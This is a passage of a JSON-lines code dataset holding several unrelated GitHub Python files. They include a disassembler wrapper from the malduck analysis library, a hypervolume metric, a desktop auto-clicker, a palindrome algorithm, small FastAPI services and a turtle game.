-> str:\n if self.is_imm:\n if self.x64:\n return \"0x%016x\" % (int(self.value) % 2**64)\n else:\n return \"0x%08x\" % (int(self.value) % 2**32)\n elif self.is_reg:\n return str(self.reg)\n elif self.is_mem:\n s, m = [], self.mem\n if m is None:\n raise Exception(\"Invalid mem object\")\n if m.base:\n s.append(m.base)\n if m.index:\n s.append(\"%d*%s\" % (m.scale, m.index))\n if m.disp:\n s.append(\"0x%08x\" % (m.disp % 2**32))\n return \"%s [%s]\" % (m.size, \"+\".join(s))\n else:\n raise Exception(\"Invalid Operand type\")\n\n\nclass Instruction(object):\n \"\"\"\n Represents single instruction in :class:`Disassemble`\n\n short: insn\n\n Properties correspond to the following elements of instruction:\n\n .. code-block:: python\n\n 00400000 imul ecx, edx, 0\n [addr] [mnem] [op1], [op2], [op3]\n\n Usage example:\n\n .. code-block:: python\n\n def get_move_value(self, p, hit, *args):\n # find move value of `mov eax, x`\n for ins in p.disasmv(hit, 0x100):\n if ins.mnem == 'mov' and ins.op1.value == 'eax':\n return ins.op2.value\n\n .. seealso::\n\n :py:meth:`malduck.procmem.ProcessMemory.disasmv`\n \"\"\"\n\n def __init__(\n self,\n mnem: Optional[str] = None,\n op1: Optional[Operand] = None,\n op2: Optional[Operand] = None,\n op3: Optional[Operand] = None,\n addr: Optional[int] = None,\n x64: bool = False,\n ) -> None:\n self.insn = None\n self.mnem = mnem\n self.operands = op1, op2, op3\n self._addr = addr\n self.x64 = x64\n\n def parse(self, insn: CsInsn) -> None:\n self.insn = insn\n self.mnem = insn.mnemonic\n\n operands: List[Optional[Operand]] = []\n for op in insn.operands + [None, None, None]:\n operands.append(Operand(op, self.x64) if op else None)\n self.operands = operands[0], operands[1], operands[2]\n\n @staticmethod\n def from_capstone(insn: CsInsn, x64: bool = False) -> \"Instruction\":\n ret = Instruction()\n ret.x64 = x64\n ret.parse(insn)\n return ret\n\n @property\n def op1(self) -> Optional[Operand]:\n \"\"\"First operand\"\"\"\n return self.operands[0]\n\n @property\n def op2(self) -> Optional[Operand]:\n \"\"\"Second operand\"\"\"\n return self.operands[1]\n\n @property\n def op3(self) -> Optional[Operand]:\n \"\"\"Third operand\"\"\"\n return self.operands[2]\n\n @property\n def addr(self) -> Optional[int]:\n \"\"\"Instruction address\"\"\"\n if self._addr:\n return self._addr\n if self.insn is not None:\n return self.insn.address\n return None\n\n def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Instruction):\n return False\n if self.mnem != other.mnem or self.addr != other.addr:\n return False\n if self.operands == other.operands:\n return True\n return False\n\n def __str__(self) -> str:\n operands = []\n if self.op1 is not None:\n operands.append(str(self.op1))\n if self.op2 is not None:\n operands.append(str(self.op2))\n if self.op3 is not None:\n operands.append(str(self.op3))\n if operands:\n return \"%s %s\" % (self.mnem, \", \".join(operands))\n return self.mnem or \"\"\n\n\nclass Disassemble:\n def __init__(self) -> None:\n import capstone.x86\n\n Operand._x86_op_imm = capstone.x86.X86_OP_IMM\n Operand._x86_op_reg = capstone.x86.X86_OP_REG\n Operand._x86_op_mem = capstone.x86.X86_OP_MEM\n\n # Index the available x86 registers.\n for reg in dir(capstone.x86):\n if not reg.startswith(\"X86_REG_\"):\n continue\n Operand.regs[getattr(capstone.x86, reg)] = reg.split(\"_\")[2].lower()\n\n def disassemble(\n self, data: bytes, addr: int, x64: bool = False, count: int = 0\n ) -> Iterator[Instruction]:\n \"\"\"\n Disassembles data from specific address\n\n .. versionchanged :: 4.0.0\n\n Returns iterator instead of list of instructions, accepts maximum\n number of instructions to disassemble\n\n short: disasm\n\n :param data: Block of data to disasseble\n :type data: bytes\n :param addr: Virtual address of data\n :type addr: int\n :param x64: Disassemble in x86-64 mode?\n :type x64: bool (default=False)\n :param count: Number of instructions to disassemble\n :type count: int (default=0)\n :return: Returns iterator of instructions\n :rtype: Iterator[:class:`Instruction`]\n \"\"\"\n import capstone\n\n cs = capstone.Cs(\n capstone.CS_ARCH_X86, capstone.CS_MODE_64 if x64 else capstone.CS_MODE_32\n )\n cs.detail = True\n for insn in cs.disasm(data, addr, count):\n yield Instruction.from_capstone(insn, x64=x64)\n\n __call__ = disassemble\n\n\ndisasm = Disassemble()\ninsn = Instruction\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"} +{"seq_id":"26407720826","text":"from abc import ABCMeta, abstractmethod\nfrom typing import List, TypeVar\n\n\"\"\"\n.. module:: indicators\n :platform: Unix, Windows\n :synopsis: Quality indicators implementation.\n\n.. moduleauthor:: Antonio Benítez-Hidalgo , Simon Wessing\n\"\"\"\n\nS = TypeVar('S')\n\nclass Front:\n def __init__(self, objectives, variables):\n self.objectives = objectives\n self.variables = variables\n self.attributes = {}\n self.number_of_objectives = len(objectives)\n self.number_of_variables = len(variables)\n\nclass Metric:\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def get_name(self) -> str:\n return self.__class__.__name__\n\n @abstractmethod\n def compute(self, front: List[Front]):\n pass\n\nclass HyperVolume(Metric):\n \"\"\" Hypervolume computation based on variant 3 of the algorithm in the paper:\n\n * C. M. Fonseca, L. Paquete, and M. Lopez-Ibanez. An improved dimension-sweep\n algorithm for the hypervolume indicator. In IEEE Congress on Evolutionary\n Computation, pages 1157-1163, Vancouver, Canada, July 2006.\n\n Minimization is implicitly assumed here!\n \"\"\"\n\n def __init__(self, reference_point: list):\n \"\"\"Constructor.\"\"\"\n self.referencePoint = reference_point\n self.list: MultiList = []\n\n def compute(self, front: List[Front]):\n \"\"\"Before the HV computation, front and reference point are translated, so\n that the reference point is [0, ..., 0].\n\n :return: The hypervolume that is dominated by a non-dominated front.\n \"\"\"\n def get_variables() -> list:\n result = []\n for solution in front:\n result.append(solution.objectives)\n\n return result\n\n front = get_variables()\n\n def weakly_dominates(point, other):\n for i in range(len(point)):\n if point[i] > other[i]:\n return False\n return True\n\n relevant_points = []\n reference_point = self.referencePoint\n dimensions = len(reference_point)\n for point in front:\n # only consider points that dominate the reference point\n if weakly_dominates(point, reference_point):\n relevant_points.append(point)\n if any(reference_point):\n # shift points so that reference_point == [0, ..., 0]\n # this way the reference point doesn't have to be explicitly used\n # in the HV computation\n for j in range(len(relevant_points)):\n relevant_points[j] = [relevant_points[j][i] - reference_point[i] for i in range(dimensions)]\n self._pre_process(relevant_points)\n bounds = [-1.0e308] * dimensions\n\n return self._hv_recursive(dimensions - 1, len(relevant_points), bounds)\n\n def _hv_recursive(self, dim_index: int, length: int, bounds: list):\n \"\"\"Recursive call to hypervolume calculation.\n\n In contrast to the paper, the code assumes that the reference point\n is [0, ..., 0]. This allows the avoidance of a few operations.\n \"\"\"\n hvol = 0.0\n sentinel = self.list.sentinel\n if length == 0:\n return hvol\n elif dim_index == 0:\n # special case: only one dimension\n # why using hypervolume at all?\n return -sentinel.next[0].cargo[0]\n elif dim_index == 1:\n # special case: two dimensions, end recursion\n q = sentinel.next[1]\n h = q.cargo[0]\n p = q.next[1]\n while p is not sentinel:\n p_cargo = p.cargo\n hvol += h * (q.cargo[1] - p_cargo[1])\n if p_cargo[0] < h:\n h = p_cargo[0]\n q = p\n p = q.next[1]\n hvol += h * q.cargo[1]\n return hvol\n else:\n remove = self.list.remove\n reinsert = self.list.reinsert\n hv_recursive = self._hv_recursive\n p = sentinel\n q = p.prev[dim_index]\n while q.cargo is not None:\n if q.ignore < dim_index:\n q.ignore = 0\n q = q.prev[dim_index]\n q = p.prev[dim_index]\n while length > 1 and (\n q.cargo[dim_index] > bounds[dim_index] or q.prev[dim_index].cargo[dim_index] >= bounds[dim_index]):\n p = q\n remove(p, dim_index, bounds)\n q = p.prev[dim_index]\n length -= 1\n q_area = q.area\n q_cargo = q.cargo\n q_prev_dim_index = q.prev[dim_index]\n if length > 1:\n hvol = q_prev_dim_index.volume[dim_index] + q_prev_dim_index.area[dim_index] * (\n q_cargo[dim_index] - q_prev_dim_index.cargo[dim_index])\n else:\n q_area[0] = 1\n q_area[1:dim_index + 1] = [q_area[i] * -q_cargo[i] for i in range(dim_index)]\n q.volume[dim_index] = hvol\n if q.ignore >= dim_index:\n q_area[dim_index] = q_prev_dim_index.area[dim_index]\n else:\n q_area[dim_index] = hv_recursive(dim_index - 1, length, bounds)\n if q_area[dim_index] <= q_prev_dim_index.area[dim_index]:\n q.ignore = dim_index\n while p is not sentinel:\n p_cargo_dim_index = p.cargo[dim_index]\n hvol += q.area[dim_index] * (p_cargo_dim_index - q.cargo[dim_index])\n bounds[dim_index] = p_cargo_dim_index\n reinsert(p, dim_index, bounds)\n length += 1\n q = p\n p = p.next[dim_index]\n q.volume[dim_index] = hvol\n if q.ignore >= dim_index:\n q.area[dim_index] = q.prev[dim_index].area[dim_index]\n else:\n q.area[dim_index] = hv_recursive(dim_index - 1, length, bounds)\n if q.area[dim_index] <= q.prev[dim_index].area[dim_index]:\n q.ignore = dim_index\n hvol -= q.area[dim_index] * q.cargo[dim_index]\n return hvol\n\n def _pre_process(self, front):\n \"\"\"Sets up the list front structure needed for calculation.\"\"\"\n dimensions = len(self.referencePoint)\n node_list = MultiList(dimensions)\n nodes = [MultiList.Node(dimensions, point) for point in front]\n for i in range(dimensions):\n self._sort_by_dimension(nodes, i)\n node_list.extend(nodes, i)\n self.list = node_list\n\n def _sort_by_dimension(self, nodes, i):\n \"\"\"Sorts the list of nodes by the i-th value of the contained points.\"\"\"\n # build a list of tuples of (point[i], node)\n decorated = [(node.cargo[i], node) for node in nodes]\n # sort by this value\n decorated.sort(key=lambda n: n[0])\n # write back to original list\n nodes[:] = [node for (_, node) in decorated]\n\n def get_name(self) -> str:\n return 'Hypervolume'\n\n\nclass MultiList:\n \"\"\"A special front structure needed by FonsecaHyperVolume.\n\n It consists of several doubly linked lists that share common nodes. So,\n every node has multiple predecessors and successors, one in every list.\n \"\"\"\n\n class Node:\n\n def __init__(self, number_lists, cargo=None):\n self.cargo = cargo\n self.next = [None] * number_lists\n self.prev = [None] * number_lists\n self.ignore = 0\n self.area = [0.0] * number_lists\n self.volume = [0.0] * number_lists\n\n def __str__(self):\n return str(self.cargo)\n\n def __init__(self, number_lists):\n \"\"\" Builds 'numberLists' doubly linked lists.\n \"\"\"\n self.number_lists = number_lists\n self.sentinel = MultiList.Node(number_lists)\n self.sentinel.next = [self.sentinel] * number_lists\n self.sentinel.prev = [self.sentinel] * number_lists\n\n def __str__(self):\n strings = []\n for i in range(self.number_lists):\n current_list = []\n node = self.sentinel.next[i]\n while node != self.sentinel:\n current_list.append(str(node))\n node = node.next[i]\n strings.append(str(current_list))\n string_repr = \"\"\n for string in strings:\n string_repr += string + \"\\n\"\n return string_repr\n\n def __len__(self):\n \"\"\"Returns the number of lists that are included in this MultiList.\"\"\"\n return self.number_lists\n\n def get_length(self, i):\n \"\"\"Returns the length of the i-th list.\"\"\"\n length = 0\n sentinel = self.sentinel\n node = sentinel.next[i]\n while node != sentinel:\n length += 1\n node = node.next[i]\n return length\n\n def append(self, node, index):\n \"\"\" Appends a node to the end of the list at the given index.\"\"\"\n last_but_one = self.sentinel.prev[index]\n node.next[index] = self.sentinel\n node.prev[index] = last_but_one\n # set the last element as the new one\n self.sentinel.prev[index] = node\n last_but_one.next[index] = node\n\n def extend(self, nodes, index):\n \"\"\" Extends the list at the given index with the nodes.\"\"\"\n sentinel = self.sentinel\n for node in nodes:\n last_but_one = sentinel.prev[index]\n node.next[index] = sentinel\n node.prev[index] = last_but_one\n # set the last element as the new one\n sentinel.prev[index] = node\n last_but_one.next[index] = node\n\n def remove(self, node, index, bounds):\n \"\"\" Removes and returns 'node' from all lists in [0, 'index'[.\"\"\"\n for i in range(index):\n predecessor = node.prev[i]\n successor = node.next[i]\n predecessor.next[i] = successor\n successor.prev[i] = predecessor\n if bounds[i] > node.cargo[i]:\n bounds[i] = node.cargo[i]\n return node\n\n def reinsert(self, node, index, bounds):\n \"\"\" Inserts 'node' at the position it had in all lists in [0, 'index'[\n before it was removed. This method assumes that the next and previous\n nodes of the node that is reinserted are in the list.\n \"\"\"\n for i in range(index):\n node.prev[i].next[i] = node\n node.next[i].prev[i] = node\n if bounds[i] > node.cargo[i]:\n bounds[i] = node.cargo[i]\n","repo_name":"LuckysonKhaidem/HyperVolume-Maximization","sub_path":"hypervolume.py","file_name":"hypervolume.py","file_ext":"py","file_size_in_byte":10542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25965987861","text":"import threading\nfrom pyautogui import *\nimport pyautogui\nimport time, keyboard, threading\nimport win32api, win32con, win32gui\n\n# Clicks per second\ncps = 10\n\n\n# Click function, will click where x and y are set\ndef click ():\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\n time.sleep(0.001) # Pause script for 0.01 seconds for mouse down to register\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ndef set_speed():\n global current_option\n # Prompt\n print(\"Choose your clicks per second for the program\")\n\n # Reset value\n global cps\n cps = 0\n\n # Make sure value is integer\n while (cps == 0):\n if (current_option == 0):\n break\n try:\n cps = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"Your clicks per second are now \"+str(cps))\n current_option = 0 \n print(\"Select a new option\")\n \n# Spam button\ndef click_mouse():\n global cps\n click()\n check_end()\n\n# Click position variables\ndef click_positions():\n global cps\n global current_option\n state_left = win32api.GetKeyState(0x01) # Left button up = 0 or 1. Button down = -127 or -128\n let_go = True\n positions = []\n\n # Prompt\n print(\"Click on the positions you would like to select, press alt+3 to end\")\n\n # Wait to let go \n while keyboard.is_pressed('alt+3'):\n pass\n \n # Get options\n while (keyboard.is_pressed('alt+3') == False):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n positions.append(win32gui.GetCursorPos())\n let_go = False\n print(len(positions))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n\n print(\"Your positions have been chosen\")\n while (current_option != 0):\n for i in range(len(positions)):\n if (current_option == 0):\n break\n win32api.SetCursorPos(positions[i])\n click()\n time.sleep((1/cps))\n\ndef click_colors():\n global cps\n global current_option\n color_option = 0\n positions = []\n\n print(\"Would you like to click colors within an area, or within certain positions (alt+1 for first option, alt+2 for second):\")\n\n option_picked = False\n while (option_picked == False):\n if (keyboard.is_pressed('alt+1')):\n color_option = 1\n option_picked = True\n elif(keyboard.is_pressed('alt+2')):\n color_option = 2\n option_picked = True\n \n if (color_option == 1):\n print(\"Select the top left and bottom right positions that you would like to search for colors in\")\n let_go = True\n tuples=[]\n pos = []\n while (len(tuples) < 2):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n tuples.append(win32gui.GetCursorPos())\n let_go = False\n print(len(tuples))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n # test print of positions\n print(tuples)\n\n # Convert tuples to just lists\n for i in range(2):\n pos.append([])\n pos[i].append(tuples[i][0])\n pos[i].append(tuples[i][1])\n \n # Swap x and y positions to correct sections\n # Swap x\n if (pos[0][0] < pos[1][0]): \n temp = pos[0][0] # record lower x\n pos[0][0] = pos[1][0] # Set higher x\n pos[1][0] = temp # Set lower x\n # Swap y\n print(pos[0][1] < pos[1][1])\n if (pos[0][1] < pos[1][1]): \n temp = pos[0][1] #record lower y\n pos[0][1] = pos[1][1] # Set higher y\n pos[1][1] = temp # Set lower y\n print(pos)\n\n print(\"How many pixels would you like to skip over when checking for colors (Lower numbers check more pixels but is slower)\")\n\n speed = -1\n while (speed < 0):\n if (current_option == 0):\n break\n try:\n speed = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"You picked \"+str(speed))\n\n # Get pixel positions\n # for x in range(pos[1][0], pos[0][0], speed):\n # for y in range(pos[1][1], pos[0][1], speed):\n # positions.append([x,y])\n\n elif (color_option == 2):\n print(\"Click on the positions you would like to check, press (alt+4) to finish\")\n let_go = True\n while (keyboard.is_pressed('alt+4') == False):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n positions.append(win32gui.GetCursorPos())\n let_go = False\n print(len(positions))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n\n print(\"Hover over the colors you would like for the program to click on and press (alt+1), press (alt+2) when you are done\")\n colors = []\n let_go = True\n while (keyboard.is_pressed('alt+2') == False):\n if (current_option == 0):\n break\n if (keyboard.is_pressed('alt+1') and let_go):\n let_go = False\n length = len(colors)\n # colors.append(pyautogui.pixel(pyautogui.position()[0], pyautogui.position()[1]))\n while (length == len(colors)):\n if (current_option == 0):\n break\n print(length == len(colors))\n try:\n colors.append(pyautogui.pixel(pyautogui.position()[0], pyautogui.position()[1]))\n except:\n pass\n print(colors)\n let_go = not keyboard.is_pressed('alt+1')\n\n \n print(\"Would you like a delay after clicking to prevent misclicks\")\n delay = -1\n while (delay == -1):\n if (current_option == 0):\n break\n try:\n delay = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"The program is now searching the area and clicking when it finds the color\")\n if (color_option == 1):\n while (current_option != 0):\n flag = 0\n pic = pyautogui.screenshot(region=(pos[1][0], pos[1][1], pos[0][0]-pos[1][0], pos[0][1]-pos[1][1]))\n\n width, height = pic.size\n for x in range(0, width, speed):\n for y in range(0, height, speed):\n \n if (current_option == 0): \n break\n current_color = pic.getpixel((x, y))\n for i in range(len(colors)):\n if (current_color == colors[i]):\n win32api.SetCursorPos((x+pos[1][0], y+pos[1][1]))\n click()\n flag = 1\n break\n if (flag == 1): break\n \n if (flag == 1): \n break\n \n \n elif (color_option == 2):\n while (current_option != 0):\n for i in range(len(positions)):\n if (current_option == 0):\n break\n current_color = 0\n while (current_color == 0):\n try:\n current_color = (pyautogui.pixel(positions[i][0], positions[i][1]))\n except:\n pass\n for p in range(len(colors)):\n if (current_color == colors[p]):\n win32api.SetCursorPos((positions[i][0], positions[i][1]))\n click()\n \n\n\n\noptions = {\n 1:set_speed,\n 2:click_mouse,\n 3:click_positions,\n 4:click_colors\n}\n\n\ncurrent_option = 0\n\ndef check_end():\n global current_option\n \n # Check for alt+0\n if (keyboard.is_pressed('alt+0')):\n \n current_option = 0\n print(\"Select a new option\")\n \n\n\n# Main program\ndef main():\n global current_option\n print(\"Welcome to PyClicker\")\n print(\"Options:\")\n print(\"(alt+1) Set speed\")\n print(\"(alt+2) Click mouse button\")\n print(\"(alt+3) Click mouse at preset positions\")\n print(\"(alt+4) Click certain colors within a position\")\n print(\"(alt+9) End program\")\n print(\"(alt+0) Stop current selection\")\n program_end = False\n while (program_end == False):\n \n if current_option != 0:\n options[current_option]()\n \n if (current_option != 4):\n time.sleep((1/cps))\n \ndef monitor_keyboard():\n global current_option\n \n while (1):\n if (current_option == 0):\n for i in range(10):\n if (keyboard.is_pressed('alt+'+str(i)) and not keyboard.is_pressed('alt+0')): \n current_option = i\n print(\"You picked option \"+str(i))\n # Check for alt+0\n if (keyboard.is_pressed('alt+0') and current_option != 0):\n current_option = 0\n print(\"Select a new option\")\n print(\"Options:\")\n print(\"(alt+1) Set speed\")\n print(\"(alt+2) Click mouse button\")\n print(\"(alt+3) Click mouse at preset positions\")\n print(\"(alt+4) Click certain colors within a position\")\n print(\"(alt+9) End program\")\n print(\"(alt+0) Stop current selection\")\n\n#Start threads\nt1 = threading.Thread(target=main, args=())\nt2 = threading.Thread(target=monitor_keyboard, args=())\nt1.start()\nt2.start()\n\n","repo_name":"luwaidev/PyClicker","sub_path":"Testing/clicker_console.py","file_name":"clicker_console.py","file_ext":"py","file_size_in_byte":10159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31149410734","text":"from sys import stdin,stdout\n##stdin=open('/Users/atulkhetan/Desktop/input.txt','r')\n##stdout=open('/Users/atulkhetan/Desktop/output.txt','w')\nfor _ in xrange(int(stdin.readline())):\n x,n=map(int,stdin.readline().split())\n sum_ans=((n*(n+1))/2)-x\n if sum_ans%2==0 and n>3:\n to_find=sum_ans/2\n till = to_find\n for i in xrange(n,0,-1):\n if i==x:\n continue\n to_find-=i\n if i-1>=to_find:\n till=i\n break\n array=[0]*(n+1)\n for i in xrange(till,n+1):\n array[i]=1\n array[to_find]=1\n array[x]=2\n if x==to_find:\n ##for x==1 and x==2\n \n if x==2 :\n array[till]=0\n array[till-1]=1\n array[3]=1\n elif x==1:\n array[till]=0\n array[till-1]=1\n array[2]=1\n else:\n array[1]=1\n array[x-1]=1\n for i in xrange(1,n+1):\n stdout.write(\"%d\"%(array[i]))\n stdout.write(\"\\n\")\n else:\n stdout.write(\"impossible\\n\")\n##stdin.close()\n##stdout.close()\n \n","repo_name":"phantomhieve/CP","sub_path":"2018/janurary(18) long/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9075830312","text":"\r\ndef convert(string):\r\n new = \"|\"\r\n for ch in string:\r\n new += ch+\"|\"\r\n return new\r\n\r\ndef longest_palindrom(string):\r\n n = len(string)*2 + 1 \r\n lps = [0 for i in range(n)]\r\n new = convert(string)\r\n lps[1] = 1\r\n center = 1\r\n right = 2\r\n \r\n max_len = 0\r\n max_center = -1\r\n\r\n for i in range(2,n):\r\n mirror = center - (i - center)\r\n lps[i] = 0\r\n dist = right - i\r\n if dist > 0:\r\n lps[i] = min(lps[mirror], dist)\r\n \r\n while (i + lps[i] + 1 < n) and (i - lps[i] - 1 > 0) and \\\r\n (i + lps[i] + 1 % 2 == 0 or new[(i+lps[i]+1)] == new[i-lps[i]-1]):\r\n lps[i] += 1\r\n\r\n if lps[i] > max_len:\r\n max_len = lps[i]\r\n max_center = i \r\n\r\n if i + lps[i] > right:\r\n center = i\r\n right = i + lps[i]\r\n\r\n if max_center % 2 == 1:\r\n off = (max_len - 1)//2\r\n length = 2*off+1\r\n else:\r\n off = max_len//2\r\n length = 2*off\r\n start = (max_center)//2 - off\r\n print(string[start:start+length])\r\n return start, length\r\n \r\nif __name__ == \"__main__\":\r\n for i in (\"babcbabcbaccba\",\"abacdfgdcaba\",\"abacdfgdcabba\",\"forgeeksskeegfor\"):\r\n longest_palindrom(i)","repo_name":"infinitevoid/algorithms","sub_path":"py/algo/dynamic/substring/longest_palindromic.py","file_name":"longest_palindromic.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10141339317","text":"import os\nimport requests\nfrom fastapi import FastAPI,File\nfrom tortoise.contrib.fastapi import register_tortoise\n\n\nfrom .api.endpoints.dogs import dogs\nfrom .api.endpoints.users import users\nfrom .api.authentication import auth\n\n\nconfig=['PSQL_USER','PSQ_PSSW','PSQL_HOST','PSQL_DB']\nuser,pssw,host,db=[os.getenv(i) for i in config]\n\n\napp = FastAPI(title='GUANE TEST',version='0.1')\n\n\nregister_tortoise(\n app,\n db_url=f'postgres://{user}:{pssw}@{host}/{db}',\n modules={\"models\": [\"backend.app.api.models\"]},\n generate_schemas=True,\n add_exception_handlers=True,\n) \n\n\n\n@app.get(\"/\")\nasync def read_root():\n return {\"Status\": \"Working\"}\n\n\napp.include_router(auth)\napp.include_router(users)\napp.include_router(dogs)\n\n@app.post(\"/api/files\",tags=[\"Files\"])\nasync def read_root(file:bytes=File(...)):\n response=requests.post('https://gttb.guane.dev/api/files',files={'file':file})\n response = response.json() if response.status_code ==201 else response.reason\n return response","repo_name":"santiagossz/guane-intern-fastapi","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72951325633","text":"#!/usr/bin/env python3\n\nimport time\nfrom turtle import Screen\nfrom game_logic.player import Player\nfrom game_logic.car_manager import CarManager\nfrom game_logic.scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.title(\"Turtle Crossing Road\")\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"white\")\nscreen.tracer(0)\nscreen.listen()\n\ntommy = Player()\nscreen.onkey(key=\"Up\", fun=tommy.move_forward)\n\nscore = Scoreboard()\ncar = CarManager()\n\ngame_is_on = True\nwhile game_is_on:\n score.score_display()\n time.sleep(0.1)\n screen.update()\n\n car.create_cars()\n car.move()\n\n for i in car.all_cars:\n if i.distance(tommy.pos()) < 20:\n game_is_on = False\n score.game_over()\n\n if tommy.ycor() == 280:\n tommy.reset_player()\n car.increase_speed()\n score.CURRENT_LEVEL += 1\n\nscreen.exitonclick()\n","repo_name":"gabrielvictorio/PythonBootcamp","sub_path":"turtle_crossing_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26727322419","text":"from fastapi import FastAPI, Request\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.middleware.gzip import GZipMiddleware\nfrom fastapi.responses import HTMLResponse\nfrom pydantic import BaseModel\nfrom textblob import TextBlob\nfrom fastapi import Body\nfrom dotenv import dotenv_values\n\n\nimport itertools\nimport collections\nimport sys\nimport os\nimport pymssql\nimport json\nimport nltk\nimport random\nimport string\n\nfrom text_processing import TextProcessing\nfrom sensitive_words_marking import SensitiveWordsMarking\nfrom transcribe import Transcribe\nfrom naivebayes import NaiveBayes\n\n\nconfig = dotenv_values(\".env\")\n# connection_string = f\"DRIVER={{SQL Server}};HOST={config['SERVER']};DATABASE={config['DATABASE']};UID={config['USERNAME']};PWD={config['PASSWORD']}\"\n\n# Create the connection to SQL SERVER\nconn = pymssql.connect(\n server=config[\"SERVER\"],\n database=config[\"DATABASE\"],\n port=config[\"PORT\"],\n user=config[\"USERNAME\"],\n password=config[\"PASSWORD\"],\n)\n# conn = pymssql.connect(\n# connection_string\n# )\ncursor = conn.cursor()\n\nnltk.download(\"punkt\")\nnltk.download(\"averaged_perceptron_tagger\")\nnltk.download(\"wordnet\")\n\n\nclass OrgQuery(BaseModel):\n name: str\n\n\nclass AudioQuery(BaseModel):\n url: str\n client_name: str\n agent_name: str\n date: str\n unique_number: int\n\n\nclass TextQuery(BaseModel):\n string: str\n\n\nclass CommentQuery(BaseModel):\n comment: str = Body(...)\n old_comment: str = Body(...)\n\n\nclass SenderQuery(BaseModel):\n sender: str = Body(...)\n old_sender: str = Body(...)\n\n\nclass DeleteQuery(BaseModel):\n old_comment: str = Body(...)\n\n\nclass RequestDelete(BaseModel):\n Request_ID: int = Body(...)\n\n\nclassifier = NaiveBayes()\n\n# middleware = [\n# Middleware(\n# CORSMiddleware,\n# allow_origins=[\"*\"],\n# allow_credentials=True,\n# allow_methods=[\"*\"],\n# allow_headers=[\"*\"],\n# )\n# ]\n\napp = FastAPI()\n\napp.add_middleware(GZipMiddleware)\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/\")\ndef read_root():\n lines = None\n with open(\"./docs/index.html\", \"r\", encoding=\"utf-8\") as f:\n lines = \"\".join(f.readlines())\n return HTMLResponse(content=lines)\n\n\n@app.get(\"/doc\")\ndef Doc():\n lines = None\n with open(\"./docs/doc.html\", \"r\", encoding=\"utf-8\") as f:\n lines = \"\".join(f.readlines())\n return HTMLResponse(content=lines)\n\n\n# @app.post(\"/stt/addOrg/\")\n# def AddOrg(query: OrgQuery):\n# N = 20\n# token_key = \"\".join(\n# random.SystemRandom().choice(string.ascii_uppercase + string.digits)\n# for _ in range(N)\n# )\n# print(token_key)\n# cursor.execute(\"SELECT * FROM Authorisation\")\n# result = cursor.fetchall()\n# print(result)\n\n\n@app.post(\"/stt/addRequest/{org_id}\")\ndef AddRequest(org_id: str, query: AudioQuery, req: Request):\n\n result = None\n\n # Auth here\n auth = req.headers[\"Authorization\"]\n cursor.execute(\"SELECT Token_ID FROM Authorisation WHERE Token_ID= %s\", auth)\n db_token_id = cursor.fetchone()\n\n # db_token_id = True # REMEBER TO COMMENT THISSSSSS\n if db_token_id is None:\n return {\"response\": \"Token Error\"}\n else:\n if query.url == \"testing\":\n # return {\"Result\": \"Not Applicable.\"}\n result = Transcribe(os.getcwd() + \"\\\\test.mp3\", True).getResult()\n else:\n result = Transcribe(query.url.strip()).getResult()\n\n # Result [0] = sender\n # Result [1] = text\n\n conversations = []\n word_counts_sentence = \"\"\n cnt = 1\n request = dict()\n request[\n \"Request_ID\"\n ] = f\"{query.client_name}_{query.agent_name}_{query.date}_{query.unique_number}\"\n\n for r in result:\n obj = {\"Conversation_ID\": cnt, \"Sender\": r[0], \"Content\": r[1]}\n classifiedObj = classifier.classifySentences(r[1])\n obj[\"Sentiment\"] = classifiedObj[\"sentiment\"]\n obj[\"Confidence\"] = classifiedObj[\"confidence\"] * 100\n obj[\"Comment\"] = \"\"\n obj[\"Request_ID\"] = request[\"Request_ID\"]\n conversations.append(obj)\n cnt += 1\n\n word_counts_sentence += TextProcessing(r[1]).getProcessedSentence() + \" \"\n\n word_counts = TextProcessing(word_counts_sentence).getWordCounts()\n word_counts = dict(\n sorted(word_counts.items(), key=lambda x: x[1], reverse=True)\n )\n\n for key, value in word_counts.items():\n\n request[\"Highest_Count\"] = value\n break\n\n request[\"Audio_URL\"] = query.url\n request[\"Date\"] = query.date\n request[\"Org_ID\"] = org_id\n\n objCnt = 0\n posCnt = 0\n 